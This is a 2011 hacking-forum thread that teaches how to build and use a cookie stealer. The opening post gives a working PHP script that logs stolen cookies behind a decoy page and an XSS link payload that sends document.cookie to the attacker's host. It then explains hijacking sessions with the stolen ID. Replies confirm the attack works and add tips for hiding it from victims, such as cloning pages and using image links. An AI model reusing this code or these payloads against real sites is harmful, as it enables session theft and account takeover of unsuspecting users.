Page 1 of 1

Cookie Stealer [Tutorial]

Posted: Wed Jun 15, 2011 6:03 pm
by Geordie_Mafia
Hi guys,

In order for a cookie stealer to work, you must find a vulnarable website, that you can post java script into. the code in previous post looks a little wrong. Here is the proper method of doing this.

Things you need
......................
1. firefox
2. firebug addon for firefox
3. firecookie addon for fire fox
4. Free webhosting account

So.... once you have the above programs/addons installed and your free hosting account please proceed...

Create a new text document and insert this code

Code: Select all

<?php

$cookie=$HTTP_GET_VARS["cookie"];
$data=date("I ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('cookies.txt','a');
fwrite($file,"DATE :$data || USER AGENT:$user_agent || cookie:$cookie\n");
fclose($file);

echo '<b> sorry this page is under construction</b></ br>
</ br>Please click <a href="http://www.redirecttoanywebsite.com/">here</a> to go back to previous menu'

?>
Please be sure to rename the domain "http://www.redirecttoanywebsite.com" to a website of your choice.

Now i am not going to give you any websites that are vulnarable, find them for yourself ;p

assuming you have one, you will enter this code,

Code: Select all

<a onclick="document.location='http://yourfreehostingaccountdomain.com/index?cookie='+escape(document.cookie);" href="#">click here</a> 
When someone click on the link they will be directed to a page that says its under construction, and a new txt document will be created on your hosting account called cookies.txt

Than open firefox, goto your posted java script..... Open options and clear all cookies, open the firebug icon top right of firefox and click cookie. replace sid cookie with the cookie you have stolen.... and now you have logged in with there account

Any Questions please ask

Geordie_Mafia

Re: [TUT]Cookie Stealer[TUT]

Posted: Wed Jun 15, 2011 6:30 pm
by Sethioz
bit lost with the link part. i uploaded it to my hosting
http://sethioz.com/stuff/cookiez/cookiez.php

what would the link look like then, like this ?

Code: Select all

<a onclick="document.location='http://sethioz.co.uk/stuff/index?cookie='+escape(document.cookie);" href="#">click here</a>

Re: [TUT]Cookie Stealer[TUT]

Posted: Wed Jun 15, 2011 6:35 pm
by Geordie_Mafia
Sethioz wrote:bit lost with the link part. i uploaded it to my hosting
http://sethioz.com/stuff/cookiez/cookiez.php

what would the link look like then, like this ?

Code: Select all

<a onclick="document.location='http://sethioz.co.uk/stuff/index?cookie='+escape(document.cookie);" href="#">click here</a>
If you are to use

http://sethioz.com/stuff/cookiez/cookiez.php

Then the code would look like

Code: Select all

<a onclick="document.location='http://sethioz.co.uk/stuff/cookiez/index.php?cookie='+escape(document.cookie);" href="#">click here</a>
Name the cookie stealer what ever you want index.pgp, cookie.php etc then you would rename the link "cookiez/index.php?" to what ever you name the stealer script

Re: [TUT]Cookie Stealer[TUT]

Posted: Wed Jun 15, 2011 9:35 pm
by Sethioz
it works fine thx. i tested on my own site. it ripped the cookie nicely.

you are allowed to post vulnerable sites, however do not post links. if you wish to post vulnerable sites, either put links in some other form (site_dot_com) or attach a list as file.

in order to make it perfect, you can make a copy of some page and redirect it there, so victim never notices :)
it can also be put inside of picture links.

however you dont need firebug or firecookie. cookie editor addon works fine and you do not need to delete all cookies in order to use somebody else's cookie.
all you need is to change the session id / hash in the cookie and it'll work.
that can be done either by editing a cookie (using a tool on your choice) or by using a intercepting proxy, such as webscarab.

Re: Cookie Stealer [Tutorial]

Posted: Tue Jun 21, 2011 6:48 pm
by Geordie_Mafia
I am pleased it worked well,,,,

For better maybe you can image this up or such to help people on really how to. I havent explained well for begginer so...... I will try and post other useful hacks/exploits on the go here.

May also be better for an admin to seperate topics for easy findings?

Re: Cookie Stealer [Tutorial]

Posted: Wed Jun 22, 2011 1:08 am
by Sethioz
if you want, you can write article for my wiki. cant bother "sperating" topics or explaining better on forum. if someone do not understand, then there is registration and reply buttons :)
however if you want to write articles for my wiki, PM me about it and ill explain in detail how it has to be (either this or any other), then that article can be linked in the first post of the topic, thts enough to keep mess out.

Re: Cookie Stealer [Tutorial]

Posted: Fri Jul 01, 2011 10:16 pm
by Warzone
i was wondering instead of making a website and this hole big process
can we just send the cookie stealer to the victim throw the email
if it yes what i have to
thnks

Re: Cookie Stealer [Tutorial]

Posted: Sat Jul 02, 2011 1:46 pm
by Sethioz
if email allows the link, then yes, however where do you put the cookie stealer ? you're not even readin the thread, are you ?
basically what you just said is complete nonsense.

1. cookie stealer STEALS a COOKIE you use on website, if victim opens it without going to a site, it does nothing. it might only steal their email cookie.
2. cookie stealer does NOT run locally, it has to be placed in web, which means a website.

try understanding first what cookie stealer is.
and what is hole process ? a process that is inside of a big hole or something ? HOLE is a thing where you can put things, like black hole in space or hole in the ground .. or hole in the brain

Re: Cookie Stealer [Tutorial]

Posted: Tue Jul 12, 2011 9:06 pm
by Warzone
i have some questions please

1- i need a vulnerable site to upload the stealer i looked over 25 hosting services and nothing works for me .

2- about this code where i have to put it

Code: Select all

    <a onclick="document.location='http://yourfreehostingaccountdomain.com/index?cookie='+escape(document.cookie);" href="#">click here</a> 
this is an example i made

Code: Select all

    <?php

    $cookie=$HTTP_GET_VARS["cookie"];
    $data=date("I ds of F Y h:i:s A");
    $user_agent=$_SERVER['HTTP_USER_AGENT'];
    $file=fopen('cookies.txt','a');
    fwrite($file,"DATE :$data || USER AGENT:$user_agent || cookie:$cookie\n");
    fclose($file);

    echo '<b> sorry this page is under construction</b></ br>
    </ br>Please click <a href="http://localhost/">here</a> to go back to previous menu'

    ?>
is there any thing wrong with my work?

3- you said
it can also be put inside of picture links.
how please explain

i know i am asking a lot but a want to learn :)

Re: Cookie Stealer [Tutorial]

Posted: Tue Jul 12, 2011 11:01 pm
by Sethioz
1- i need a vulnerable site to upload the stealer i looked over 25 hosting services and nothing works for me .
this makes no sense, since you DO NOT upload cookie stealer to vulnerable site, you attack a vulnerable site with cookie stealer, you upload it to your hosting.
if you can get yourself public IP and open ports, it works when running a server.

everything else was already explained, i made a test with examples and its all here.

Re: Cookie Stealer [Tutorial]

Posted: Wed Jan 18, 2012 4:26 am
by rawrmiester19
sorry for the necro but I am rather stupid as i cant seem to figure out how to do this um for the most part i understand the making a webpage with that code um but then i dont know what after i also dont know what website host i can use is google acceptable? then what do i do with the second code? sorry for being a noob =(

Re: Cookie Stealer [Tutorial]

Posted: Wed Jan 18, 2012 1:21 pm
by Sethioz
i don't think you do understand. it is php page and then link to it.
if you don't reconize php code, then obviously you don't even know basics.

<?php ?> are tags for php page start and end, meaning it is php page, so no google site will not do. how can you understand making a site, if you ...well don't understand ?
google site is premade site and does not allow you to upload custom pages.

there is already example on how to use this, i got bit confused with the link part and so there is perfect example by Geordie_Mafia
read thru the topic